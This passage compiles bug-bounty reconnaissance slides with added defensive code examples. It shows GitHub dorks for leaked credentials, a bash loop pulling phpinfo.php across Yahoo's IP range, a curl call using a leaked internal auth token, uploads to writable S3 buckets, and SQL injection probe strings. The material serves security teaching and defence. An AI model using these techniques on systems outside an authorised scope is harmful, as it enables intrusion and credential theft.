  curl -s "https://certspotter.com/api/v0/certs?domain=$1" | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep "$1" > ~/"$1/$1.txt"
}

dirbruteforce(){
  # run in a subshell so the cd does not leak into the aliases called after this one
  (cd /tools/dirsearch && while read -r line; do python3 dirsearch.py -e . -u "https://$line"; done < ~/"$1/$1.txt")
}

screenshot(){
  # write under ~/$1 like the other steps; a relative ./$1 would depend on the caller's cwd
  python ~/tools/webscreenshot/webscreenshot.py -o ~/"$1/screenshots/" -i ~/"$1/$1.txt" --timeout=10 -m
}

recon(){
  certspotter "$1"
  dirbruteforce "$1"
  screenshot "$1"
}

Game changer

Put your aliases together
recon(){
  certspotter $1
  dirbruteforce $1
  screenshot $1
  [...]
}
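The crt.sh one-liner and the certspotter alias both boil down to one step: pull every name out of the JSON, drop wildcards, keep what belongs to the target. As an added example that is not from the talk, here is that step in Python with constructed sample responses for both APIs; it also handles the newline-packed name_value field crt.sh returns and scopes by DNS suffix rather than a plain grep, which would also match look-alike domains.

```python
import json
from typing import Iterable, List, Set

# Constructed sample responses (not real API output). crt.sh returns one object per
# certificate whose "name_value" packs several SANs separated by newlines; certspotter
# v0 returns a "dns_names" list per certificate.
CRTSH_SAMPLE = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "www.example.test\nexample.test"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "*.dev.example.test\nDEV.example.test"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "notexample.test"},
    {"issuer_name": "C=US, O=Let's Encrypt", "name_value": "example.test.evil.test"},
])
CERTSPOTTER_SAMPLE = json.dumps([
    {"dns_names": ["api.example.test", "*.example.test"]},
    {"dns_names": ["stage-1.corp.example.test", "www.example.test"]},
])


def names_from_response(raw: str) -> Iterable[str]:
    """Yield every DNS name in a crt.sh or certspotter JSON body (both shapes handled)."""
    for entry in json.loads(raw):
        if "dns_names" in entry:              # certspotter
            yield from entry["dns_names"]
        elif "name_value" in entry:           # crt.sh
            yield from entry["name_value"].split("\n")


def in_scope(name: str, domain: str) -> bool:
    """True for the apex or any label under it; a plain substring grep would also accept
    notexample.test and example.test.evil.test."""
    return name == domain or name.endswith("." + domain)


def subdomains(raw: str, domain: str) -> List[str]:
    """Unique, lowercased, in-scope names from one API response."""
    domain = domain.lower().strip(".")
    found: Set[str] = set()
    for name in names_from_response(raw):
        name = name.strip().lower().rstrip(".")
        if name.startswith("*."):
            name = name[2:]               # a wildcard cert still tells us the parent name exists
        if name and in_scope(name, domain):
            found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for src in (CRTSH_SAMPLE, CERTSPOTTER_SAMPLE):
        print("\n".join(subdomains(src, "example.test")), end="\n\n")
```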
LazyRecon
Digital Dumpster Diving
(I’m a pro at it)

● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]

Do you see a pattern here?
Github Recon
Tools and Keywords

● gitrob
● git-all-secrets
● truffleHog
● git-secrets
● repo-supervisor
● Do it manually?

Github Recon Examples

● “company.com” “dev”
● “dev.company.com”
● “company.com” API_key
● “company.com” password
● “api.company.com” authorization
● GET CREATIVE!

Keywords: APP_SECRET, consumerkey, JIRA_Password, jdbc, “authorization bearer”, auth_key, consumer_secret, SECURITY-SIGNATURE, X-API, X-Paypal, secret_key, JWK/JWT, SSO_LOGIN, defaultEndpointsProtocol, access_key, accountKey, AWS_Secret, aws_secret_access_key, rexis, api_key
Archive.org (Wayback Machine)

“That's when I found this. An end of the world party featuring DJ Mobley. I'm not an EDM fan myself, but a quick search on the wayback machine, and guess what we found all the way from 2003. You. An Angelfire page that you created from back in the day. Your very own DJ Mobley fan page.”

Archive.org

● Search for your target
● Select a date
● Review the source -> find JS files
● Find old endpoints/functionality
● Exploit them!
Javascript Files

Why?

● Look for (hidden) endpoints
● Leaked cloud instances and their secret_keys
● … and definitely more bugs

Javascript Files Examples

Trello Boards

● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
Examples

Examples of Certificate Transparency

Shodan Examples
Search Query: hostname:host.com port:15672

Search Query: hostname:host.com title:Dashboard [Jenkins]

Censys Examples
● Working example:

Examples of Discovering Endpoints Hidden Inside of Javascript Files
Airbnb – Web to App Phone Notification IDOR to view Everyone’s Airbnb Messages

API Requests

https://www.airbnb.com/api/v2/air_sms_notifications

● Requires that you have a verified phone number in your profile.
● This API request allowed you to send yourself SMS texts.
● There is a length limit on the SMS messages (160)
● Throttling restrictions on SMS only allowed you to send this API request a handful of times every hour

API Requests

https://www.airbnb.com/api/v2/air_push_notifications

● Requires that you have a verified phone number, the Airbnb app installed on your phone (with that phone number), and you are logged into the app with that account. (This one took awhile to figure out)
● Instead of sending SMS, it pushed notifications to your phone through the phone app.
● There is no length restriction on the output.
● No throttling which made testing a lot easier compared to SMS

POST REQUEST:

{"_format":"for_visitor","country":"USA","phone_number":"","template":"message","user_id":,"title":"","body":"","metadata":{},"object_id":"","status":"","role":"","photo_url":""}

If you passed in an invalid template it would give you a list of all the valid templates that you could send.
Then we found out we can send ourselves custom messages:

{"_format":"for_visitor","country":"USA","phone_number":"","template":"custom","user_id":109764261,"status":"test","title":"test","body":"test"}

What else can we do?

Perhaps enumerate on user_id and object_id in each request and get access to other users’ notifications?
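The fix side of that bug class, as an added example that is hypothetical and not Airbnb's code: a notification handler that trusts user_id and object_id from the JSON body next to one that takes the recipient from the session and checks the referenced object belongs to that user. The session store and message table are constructed in-memory stand-ins.

```python
import json
from typing import Dict, Tuple

# Constructed stand-ins (not Airbnb's data): session -> user id, and a message table
# keyed by object_id holding (owner user id, text).
SESSIONS: Dict[str, int] = {"sess-alice": 1001, "sess-bob": 1002}
MESSAGES: Dict[int, Tuple[int, str]] = {
    5001: (1001, "Alice: your booking is confirmed"),
    5002: (1002, "Bob: the host replied to your question"),
}


class Forbidden(Exception):
    pass


def render(template: str, title: str, body: str, message_text: str) -> Dict[str, str]:
    # "custom" echoes caller-supplied text; any other template renders the stored object
    if template == "custom":
        return {"title": title, "body": body}
    return {"title": title or "New message", "body": message_text}


def notify_vulnerable(session_id: str, raw_body: str) -> Dict:
    """Before: recipient and object both come from the JSON body, so any logged-in
    caller can name another user's object_id and have its text pushed to themselves."""
    req = json.loads(raw_body)
    user_id = req["user_id"]                      # attacker-controlled
    _owner, text = MESSAGES[req["object_id"]]     # owner is never compared to the caller
    return {"to": user_id, **render(req["template"], req.get("title", ""), req.get("body", ""), text)}


def notify_fixed(session_id: str, raw_body: str) -> Dict:
    """After: the recipient is the session user, and a referenced object must belong to them."""
    req = json.loads(raw_body)
    user_id = SESSIONS.get(session_id)
    if user_id is None:
        raise Forbidden("not logged in")
    if req.get("user_id", user_id) != user_id:
        # worth logging: a body user_id that disagrees with the session is an IDOR probe
        raise Forbidden("user_id does not match session")
    text = ""
    if req.get("template") != "custom":
        message = MESSAGES.get(req.get("object_id"))
        if message is None or message[0] != user_id:
            # same error for missing and foreign objects, so the endpoint is no existence oracle
            raise Forbidden("object not found")
        text = message[1]
    return {"to": user_id,
            **render(req.get("template", "message"), req.get("title", ""), req.get("body", ""), text)}


def is_forbidden(handler, session_id: str, raw_body: str) -> bool:
    """True if the handler rejects the request (used by the demo and tests)."""
    try:
        handler(session_id, raw_body)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    # Bob's session addressing Alice's object: leaks under the old handler, rejected by the new one
    probe = json.dumps({"_format": "for_visitor", "template": "message",
                        "user_id": 1002, "object_id": 5001, "title": "", "body": ""})
    print("vulnerable:", notify_vulnerable("sess-bob", probe))
    print("fixed rejects probe:", is_forbidden(notify_fixed, "sess-bob", probe))
```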
Examples of Digital Dumpster Diving

Dumpster Diving Part 1

● Looked up the “umbrella” company name
● Combine “umbrella_company” + asset_name + “password”, and found this code on Github:

"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}

● Got access to umbrella_company’s FTP server
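Tools like truffleHog and git-secrets look for exactly the key names on the Github recon slide plus high-entropy strings; as an added example that is not from the talk, here is a minimal scanner of that kind run over a constructed config excerpt modelled on the FTP block above, the sort of pre-commit check that stops such a block reaching a public repo. The keyword list is the slide's; the entropy threshold, placeholder list and sample values are assumptions.

```python
import math
import re
from typing import List, NamedTuple


class Hit(NamedTuple):
    line: int
    key: str
    value: str
    why: str


# Key names from the Github recon slide (compared case-insensitively as substrings).
KEYWORDS = ["password", "secret", "api_key", "apikey", "auth_key", "consumer_secret",
            "access_key", "accountkey", "aws_secret_access_key", "secret_key",
            "jira_password", "authorization", "x-api", "sso_login"]
# key = "value" / "key": "value" with a quoted value of at least 4 characters
ASSIGN_RE = re.compile(r"""["']?(?P<key>[A-Za-z_][\w.-]*)["']?\s*[:=]\s*["'](?P<val>[^"']{4,})["']""")
# AWS access key ids share the AKIA prefix; the value below is AWS's documented example key.
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
PLACEHOLDERS = {"changeme", "xxx", "todo", "example", "<redacted>", "null", "none", "true", "false"}
ENTROPY_THRESHOLD = 4.0   # assumed; random 32-char tokens sit near 5 bits per character

# Constructed sample (not a real leak), modelled on the FTP block found on Github.
SAMPLE = '''\
"server": {
  "host": "ftp.provider.test",
  "port": 21,
  "user": "some_username",
  "password": "definitely_ftp_passwords"
}
aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"
aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
api_key = "${API_KEY}"
debug_token = "xK9v2mQ4pL8sT1wZ7nB3cR6yH0dF5gJa"
host = "localhost"
'''


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def scan(text: str) -> List[Hit]:
    """Flag sensitive key names, AWS key ids and long high-entropy values, line by line."""
    hits: List[Hit] = []
    for no, line in enumerate(text.splitlines(), 1):
        for m in AWS_KEY_RE.finditer(line):
            hits.append(Hit(no, "AWS access key id", m.group(0), "matches AKIA... pattern"))
        for m in ASSIGN_RE.finditer(line):
            key, val = m.group("key"), m.group("val")
            if val.lower() in PLACEHOLDERS or val.startswith("${"):
                continue  # templated or obviously fake values are not findings
            if any(k in key.lower() for k in KEYWORDS):
                hits.append(Hit(no, key, val, "sensitive key name"))
            elif len(val) >= 20 and entropy(val) > ENTROPY_THRESHOLD:
                hits.append(Hit(no, key, val, "high-entropy value"))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"line {h.line}: {h.key} = {h.value!r} ({h.why})")
```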
Dumpster Diving Part 2

Example of Readable/Writable S3 Buckets
AWS CLI

● Requires AWS CLI
● $ aws s3 ls s3://bucket-name
● $ aws s3 cp hax0r.txt s3://bucket-name

CNAME Pointing to Unclaimed AWS S3

● Requires AWS CLI
● $ aws s3 ls s3://bucket-name
● $ aws s3 cp hax0r.txt s3://bucket-name

Recon Automation + Github + Exploitation
Access to all internal API endpoints?

● Asset discovery: https://stgsomethjngsomething.something.target.com/
● Content discovery: https://stgsomethjngsomething1.something.target.com/internal and
● Github searches:
● Looked for the: hostname + internal + “auth-token” (on github) and found this handy curl command:

Access to all internal API endpoints?

● Looked into the JS files on the login page
● Found all of the internal API calls
● Already have an AUTH-TOKEN that works without login
● Combine all of the above:

curl -X GET "https://dev1.dev.target.com/v3/internal/internal_accounts" -H "preferred-auth: INTERNAL" -H "debug-auth-token: SORRY_I_HAD_TO_REDACT"

Return all LDAP usernames for brute force ;)?
Keep in touch

● @nahamsec on all social media
● Check out all of our programs on hackerone.com/directory
● Bensdp@hackerone.com | im@ha.cker.af
Tools

● Dirsearch - https://github.com/maurosoria/dirsearch
● JSParser - http://github.com/nahamsec/jsparser
● LazyS3 - https://github.com/nahamsec/lazys3
● LazyRecon - https://github.com/nahamsec/lazyrecon
● Teh_s3_bucketeers - https://github.com/tomdev/teh_s3_bucketeers
Thank you

● Thank YOU for letting me present
● The Hacker Community for being so welcoming and sharing their ideas
● A big thank you to: Ziot, Tomdev, ITSecurityguard, Jon Bottarini, Luke Tucker, Smiegles, Jobert Abma, Michiel Prins.
Recon Like A Boss
More Targets - More Options - More Opportunities
AGENDA
• Increase Your Attack Area
• Determine Technologies used by Website.
• Amazon Web Service (AWS) Recon & Hacking
• Github Recon
• Content Discovery
Increase Your Attack Area
Recon - Go Back in Time
• Wayback Machine to view old files like robots.txt and URLs
• Tools are out to automate this
• waybackurls.py
  Download: https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
• waybackrobots.py
  Download: https://gist.github.com/mhmdiaa/2742c5e147d49a804b408bfed3d32d07
Now We Have: WaybackURLs
Sub-domains Discovery
• Brute force on main domain
• Some scripts to automate this task
  – Knockpy: https://github.com/guelfoweb/knock
  – Sublist3r: https://github.com/aboul3la/Sublist3r
  – SubBrute: https://github.com/TheRook/subbrute
• Knockpy usage: ./knockpy target.com
• Sublist3r usage: python sublist3r.py -d target.com
• Sublist3r can also find sub-domains with specific open ports: python sublist3r.py -d target.com -p 80,443
• SubBrute usage: ./subbrute.py google.com
• You can also give SubBrute a list of domains: ./subbrute.py -t list.txt
Sub-domains Discovery Cont.
• Google Dork: site:target.com -site:www.target.com
• Online Resources:
  – https://dnsdumpster.com/
  – https://searchdns.netcraft.com/
  – https://www.virustotal.com (go to search and type target.com)
  – https://crt.sh/?q=%25paypal.com (use "%target.com")
Now We Have: WaybackURLs + Subdomains
Don't Stop Here
Find Sub-domains of Sub-domain
http://bf1-adxdb-001.data.bf1.yahoo.com/about.php
Some websites have 5th and 6th level sub-domains.

Tool: altdns (https://github.com/infosec-au/altdns)
Input: sub-domain list
Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt

Tool: SubBrute
Usage: ./subbrute.py target.com > subdomains.txt
Then: ./subbrute.py -t subdomains.txt

Now We Have: WaybackURLs + Subdomains + Subdomains of Subdomains
Sub-domain Validation
Tool: EyeWitness (https://github.com/ChrisTruncer/EyeWitness)
Provide a list of sub-domains and it will give you a report with screenshots of each sub-domain.
Usage: ./EyeWitness.py -f subdomains.txt
• Tool: Grab Them All (Mozilla addon)
Other sites on the same domain
• www.yougetsignal.com
Now We Have: WaybackURLs + Subdomains + Subdomains of Subdomains + Other Sites on the same Domain
Target IP Range
• URL: https://whois.arin.net
• Search by Target IP
• Yahoo! owns a massive block of IP addresses, from 98.136.0.0 - 98.139.255.255, which is 260,000 unique IP addresses
Got Huge IP Range
Real Case Study
• Patrik Fehrenbach (@ITSecurityguard) wrote a Bash script to download the phpinfo.php file (if found) from the Yahoo! IP range (98.136.0.0 - 98.139.255.255)
• And finally: http://nc10.n9323.mail.ne1.yahoo.com/phpinfo.php
Bash Script
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
    wget -t 1 -T 5 http://${ipa}/phpinfo.php; done&

Only 3 lines of code
Takeaways
• When hacking, consider a company's entire infrastructure. I know that Patrik has employed similar techniques to find some more. (Eg. Many people keep Backup.rar)
• Additionally, you'll notice there were 260,000 potential addresses here, which would have been impossible to scan manually.
• When performing this type of testing, automation is hugely important.
Now We Have: WaybackURLs + Subdomains + Subdomains of Subdomains + Other Sites on the same Domain + IP Range
Find New Endpoints from JS Files
• Tools used
  1. Burp Suite
  2. InputScanner (Zscanner)
  3. JS-Scan
Tools Intro.
• Burp Suite: Proxy
• Zscanner: A tool designed to scrape a list of URLs. This tool will also scrape .js urls found on each page
• JS-Scan: A tool designed to scrape a list of .js files and extract urls
How to use these tools together??
Burp Suite
• Run Spider tool on your target in Burp Suite
• Once the spider has finished, right click on the host and click "Copy Urls in this host"
Zscanner
• Once copied, paste them into urls.txt
• Put the urls.txt file in the root of Zscanner
  Eg. c/xampp/htdocs/zscanner/urls.txt
• Now open zscanner in the browser
• Click on "Begin Scanner"
• 4 files are outputted in the /outputs/ folder: JS-output.txt, GET-output.txt, POSTHost-output.txt, POSTData-output.txt
• Copy the JS-output.txt file and put it in the root of the JS-Scan folder
  Eg. c/xampp/js-scan/JS-output.txt
JS-Scan
• Open JS-Scan in the browser
• Click on Run Scanner and you will see something similar to this. That's it.
Takeaways
• Endpoints extracted from JS files are more vulnerable than endpoints defined in web pages.
• Automated scanners generally don't scan endpoints defined in JS files.
• Developers & testers don't care about them.
Now We Have: WaybackURLs + Subdomains + Subdomains of Subdomains + Other Sites on the same Domain + IP Range + New Endpoints From JS Files
Technologies Used by Web
• Wappalyzer (Mozilla Addon)
Amazon Web Services
AWS or S3 Buckets
• AWS Simple Storage Service (often shortened to S3) is used by companies that don't want to build and maintain their own storage repositories
• By using Amazon Simple Storage Service, they can store objects and files on a virtual server instead of on physical racks
• After the user has created their bucket, they can start storing their source code, certificates, passwords, content, databases and other data.
What if target is vulnerable
• You can get full access to the S3 bucket
• You can download, upload and overwrite files.
How to find S3 Buckets?
Find S3 Buckets
• Google Dork: site:amazonaws.com inurl:yahoo
• Tool: S3 bucket finder (Download: https://digi.ninja/projects/bucket_finder.php)
• Burp Suite can also help
AWS HACKING
• Install awscli in kali
• Interact with Bucket
• Find World Writable Directory.
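An added example, not from these slides or from any tool they list, of the check behind "interact with bucket": it classifies a GetBucketAcl response the way a bucket owner auditing their own S3 would, flagging grants to the AllUsers and AuthenticatedUsers groups (the grants that make `aws s3 ls` and `aws s3 cp` work for outsiders). The ACL dictionary is constructed; the optional live fetch assumes boto3 is installed and credentialed.

```python
# Group URIs that AWS uses in bucket ACLs for "everyone" and "any AWS account".
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# Constructed GetBucketAcl-style response: the shape follows the S3 API, the ids are placeholders.
SAMPLE_ACL = {
    "Owner": {"ID": "owner-canonical-id-placeholder"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "WRITE"},
    ],
}


def classify_acl(acl):
    """Return sorted findings for grants to the public groups; an empty list means none.

    On a bucket ACL, READ lets the grantee list the bucket ('aws s3 ls' succeeds),
    WRITE lets them create, overwrite and delete objects ('aws s3 cp' succeeds),
    WRITE_ACP lets them change the ACL itself, and FULL_CONTROL implies all three.
    """
    audiences = {ALL_USERS: "anyone", AUTH_USERS: "any AWS account"}
    findings = set()
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue                      # owner / canonical-user grants are not public
        audience = audiences.get(grantee.get("URI"))
        if audience is None:
            continue                      # e.g. the LogDelivery group
        perm = grant.get("Permission")
        if perm in ("READ", "FULL_CONTROL"):
            findings.add("listable by " + audience)
        if perm in ("WRITE", "FULL_CONTROL"):
            findings.add("writable by " + audience)
        if perm in ("WRITE_ACP", "FULL_CONTROL"):
            findings.add("ACL editable by " + audience)
    return sorted(findings)


def audit_bucket(name):
    """Fetch a live ACL with boto3 (assumed installed and credentialed) and classify it."""
    import boto3  # imported lazily so the offline demo runs without it
    return classify_acl(boto3.client("s3").get_bucket_acl(Bucket=name))


if __name__ == "__main__":
    for finding in classify_acl(SAMPLE_ACL) or ["no public grants"]:
        print(finding)
```

A bucket that reports any finding here is what the slides call world readable or writable; the fix is to remove the group grant (or enable S3 Block Public Access) rather than to rely on the bucket name being hard to guess.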
Now We Have: WaybackURLs + Subdomains + Subdomains of Subdomains + Other Sites on the same Domain + IP Range + New Endpoints From JS Files + S3 Buckets
Github Recon
What you can find on Github
• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns
• Go to github and search, Eg.
  - "target.com" "dev"
  - "dev.target.com"
  - "target.com" API_key
  - "target.com" password
  - "api.target.com"
• Google can also help. Dork: site:github.com "Target" password
Tools are out to automate this
• Gitrob
• Git-all-secrets
• truffleHog
• Git-secrets
• Repo-supervisor
• Do it manually [Best way]
  – All tools are available on github
Tool - truffleHog
• Usage: truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
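An added example, not truffleHog's code, that reproduces the two checks the tool's --regex and entropy modes stand for, and so also covers the "Dumpster Diving" find earlier in this page: pattern matches for known secret shapes, plus a Shannon-entropy test for random-looking strings. The sample file contents, hosts and the AKIA... key id are all constructed.

```python
import math
import os
import re

# Constructed file contents modelled on the dumpster-diving find above; nothing here is a real secret.
SAMPLE_FILE = '''"server": {
  "host": "dedXXXX.PATTERN.PROVIDER.com",
  "port": 21,
  "user": "some_username",
  "password": "definitely_ftp_passwords"
}
aws_access_key_id = AKIAEXAMPLEKEY000001
token = "xZ3pQ9vL2mK8wR4tY7uB1nC6sD0fG5hJ"
debug_level = "verbose"
'''

# Regex mode: shapes that identify a secret regardless of how random it looks.
PATTERNS = {
    # AWS access key ids are 'AKIA' plus 16 upper-case alphanumerics (the sample id is made up)
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # password-style assignment in JSON, YAML, .env or code; group 1 is the value
    "password_assignment": re.compile(
        r"""(?i)["']?(?:password|passwd|pwd)["']?\s*[:=]\s*["']([^"']{4,})["']"""),
}

# Entropy mode: any base64-alphabet run of 20+ characters is a candidate.
CANDIDATE = re.compile(r"[A-Za-z0-9+/=_-]{20,}")
ENTROPY_THRESHOLD = 4.5   # bits per character; English-like identifiers sit well below this


def shannon_entropy(s):
    """Bits per character of the string's own character distribution."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def scan_text(text, path="<input>"):
    """Return (path, line_no, rule, match) tuples for every hit in a blob of text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append((path, line_no, rule, m.group(m.lastindex or 0)))
        for m in CANDIDATE.finditer(line):
            word = m.group(0)
            if PATTERNS["aws_access_key_id"].fullmatch(word):
                continue              # already reported by the regex rule
            # a dictionary-word password scores far below the threshold, which is
            # exactly why the regex mode is run as well
            if shannon_entropy(word) >= ENTROPY_THRESHOLD:
                findings.append((path, line_no, "high_entropy_string", word))
    return findings


def scan_tree(root):
    """Walk a checked-out repository and scan every file that decodes as UTF-8 text."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]   # packed objects are binary
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8") as fh:
                    findings.extend(scan_text(fh.read(), full))
            except (UnicodeDecodeError, OSError):
                continue
    return findings


if __name__ == "__main__":
    for hit in scan_text(SAMPLE_FILE):
        print(hit)
```

Running scan_tree over your own organisation's repositories before an outsider does is the defensive use of the same search the slides describe.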
Content Discovery
• Google is your friend
• Use Google Dorks to find:
  - File Extensions
  - Parameters
  - Login Page
  - Sometimes Directory Structure
  - Important Stuff
• I often use Google Dorks to find files with a specific extension, which also reveals the technology used by the target.
• Google Dork:
  - site:target.com filetype:php
  - site:target.com filetype:aspx
  - site:target.com filetype:swf (Shockwave Flash)
  - site:target.com filetype:wsdl
• Find Parameters. Google Dork:
  - site:target.com inurl:.php?id=
  - site:target.com inurl:.php?user=
  - site:target.com inurl:.php?book=
• Find Login Page. Google Dork:
  - site:target.com inurl:login.php
  - site:target.com intext:"login"
  - site:target.com inurl:portal.php
  - site:target.com inurl:register.php
  (Note: if a site has a register page, there is a good chance it also has a login page)
• Find Directory Structure. Google Dork:
  - site:target.com intext:"index of /"
• Find Important Stuff. Google Dork:
  - site:target.com filetype:txt
  - site:target.com inurl:.php.txt
  - site:target.com ext:txt
  In most cases you will find robots.txt, but sometimes you will find really juicy stuff
• I found code in a txt file which included FTP credentials and SMTP credentials
• Even some big names in the IT field.
• Tools:
  – GoBuster [https://github.com/OJ/gobuster]
    Use: gobuster -w wordlist.txt -u http://trgt.com
  – Dirbuster
Thank You
BUG BOUNTY WORKSHOP
FUNSHOP
AGENDA
➔ Intro
➔ Bug Bounty Definition
➔ How to select a target
➔ Passive Recon Techniques
➔ Hacking with Burp Suite
➔ Importance of understanding an application flow
➔ Better Bug Bounty Report
➔ Keep up with all the new trends
➔ Live Burp Suite Session
➔ Recap | Wrapping up
Intro
#whoami
❖ Prateek Tiwari - @prateek_0490
❖ Security Lead @ Zomato
❖ Security Consultant, Occasional Bug Bounty Hunter
❖ Email: prateek0490@gmail.com
Hey you! What's Bug Bounty?
❏ A Bug Bounty is a reward offered to individuals who identify and report bugs or security vulnerabilities in a computer program, system or software.
❏ The reward could be in any form - from goodies to hard cash or just acknowledgement.
How to select a target?
Assets in scope:
● Priority to wildcard {*.example.com}
● Mobile Apps
Paying attention to out of scope / exclusions list:
● XSS
● CSRF
● Subdomain Takeovers
Meh "really? Do you even care about Security"
Diving deep into the target using passive..sh Recon
Find all the **ASSETS** that belong to that organisation. Assets?
○ Domains?
○ Subdomains?
○ 3rd Party Services used by the Organisation (GitHub, Jira, Trello, Jenkins, GitLab, etc...)
○ IP Ranges?
○ iOS / Android Apps?
○ Doesn't end [n number of assets] ......
Subdomains | Asset(s) Identification
● Subfinder [https://github.com/subfinder/subfinder]
● VirusTotal [https://www.virustotal.com/#/domain/domain.com]
● Certificate Transparency [https://crt.sh/?q=%.domain.com]
● Censys [https://www.censys.io]
● Google - site:example.com -www [Other Search Engines - Bing, DuckDuckGo, Yahoo]
● Google Certificate Transparency
[https://transparencyreport.google.com/https/certificates?hl=en]
● Facebook Certificate Transparency Monitoring
[https://developers.facebook.com/tools/ct]
● CSP Headers? Anyone? That's interesting, isn't it? Well, that has given me a couple of criticals and nice payouts. Never miss!
● GitHub, Gist, Gitlab, Trello, Jira, etc…
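An added example, not from the workshop, of what the "CSP Headers" bullet is getting at: it parses a Content-Security-Policy value and lists every host it names, then separates the organisation's own hosts from third parties, which is the same inventory a defender should run on their own headers before publishing them. The header value and all domains are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed CSP value in the shape a browser receives it; every host is made up.
SAMPLE_CSP = (
    "default-src 'self'; "
    "script-src 'self' 'unsafe-inline' https://cdn.example-corp.com "
    "https://*.internal-tools.example-corp.com https://www.google-analytics.com; "
    "connect-src 'self' wss://chat.example-corp.com https://api-staging.example-corp.com:8443 "
    "https://prod-assets-example.s3.amazonaws.com; "
    "img-src * data:; "
    "report-uri https://csp-collector.example-corp.com/report"
)

KEYWORD = re.compile(r"^'.*'$")                    # 'self', 'none', 'unsafe-inline', nonce/hash values
SCHEME_ONLY = re.compile(r"^[a-z][a-z0-9+.-]*:$")  # data:, blob:, https:


def parse_csp(value):
    """Split a CSP header value into {directive: [source, ...]}."""
    policy = {}
    for directive in value.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def hosts_from_csp(value):
    """Collect every host-source across all directives; wildcards such as *.x.com are kept."""
    hosts = set()
    for sources in parse_csp(value).values():
        for src in sources:
            if src == "*" or KEYWORD.match(src) or SCHEME_ONLY.match(src):
                continue
            # urlsplit only parses a netloc after '//', so give scheme-less sources one
            host = urlsplit(src if "://" in src else "//" + src).hostname
            if host:
                hosts.add(host)
    return sorted(hosts)


def split_by_owner(hosts, own_suffix):
    """Separate hosts under the organisation's own suffix from third-party hosts."""
    own = [h for h in hosts if h == own_suffix or h.endswith("." + own_suffix)]
    return own, [h for h in hosts if h not in own]


def csp_values(headers):
    """Pull both the enforced and the report-only policy out of a response-header mapping."""
    return [v for k, v in headers.items()
            if k.lower() in ("content-security-policy", "content-security-policy-report-only")]


if __name__ == "__main__":
    own, third = split_by_owner(hosts_from_csp(SAMPLE_CSP), "example-corp.com")
    print("own hosts:", own)
    print("third party:", third)
```

Staging hosts, internal tool wildcards and named S3 buckets in the own-host list are exactly what the bullet means by "interesting"; a policy should list only what the page actually loads.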
CSP Headers
gist.github.com
Cost of Human Errors :(
Trello, Jira, Gitlab ...
Even if an organization's Jira instance has auth, when administrators set up "public" projects they forget that "public" means public for everyone. This can sometimes give you the keys to the kingdom.
Thanks Ed :)
fofa.so - chinese version of shodan
shodan.io
IP Ranges
https://bgp.he.net/search?search%5Bsearch%5D=Smule&commit=Search
https://whois.arin.net/ui/query.do
Sir, I've found the IP Space, now what?
IP Range - now what?
● Fire NMap and run NSE Scripts on those discovered IP Ranges
● Perform content discovery (file/folder bruteforcing) on every discovered asset
  ○ BurpSuite
  ○ Dirsearch, Dirbuster
  ○ Wfuzz
Oh the mobile apps are in scope, what should I look for?
Did you know? You can find leakage of sensitive data in mobile apps without even installing them on your phone. Howwww?
Short Cut:
Long Route:
❖ Download the apk, you can do it from https://apkpure.com/
❖ Upload the apk at https://apkscan.nviso.be/, run the Scan and wait for the results.
VIRUSTOTAL
Hacking with BurpSuite
Setting the right Scope
Keeping an eye on these issues list, always handy and helps a lot!
BURP SPIDER
● Turn off Passive Scanning
● Set Forms to auto submit
● Set scope to advanced control and use a target name instead of regex (something like zomato instead of .zomato.com or .*\.zomato\.com$), you will be surprised to see the results and after effects of it 😲
● Browse all URLs, make all requests POST/GET/PUT whatever, then spider all hosts recursively
● Profit (More Targets)!
Will cover up in Live Session
Did you know? You don't always need an automated Script to demonstrate the impact of any data leak [PIIs].
Intruder for the win!
Hacking with BurpSuite
Using "Repeater tab" to find:
● XSS
● SQLi
● Privilege Escalation
● IDOR(s)
● More Bugs
● Catch a Request which accepts user input and throw it into a repeater tab.
● Start Fuzzing the parameters.
SQLi(s)
id=1'
id=1''
id=1'-sleep(10)-'
id=1"
id=1""
id=1"-sleep(10)-"
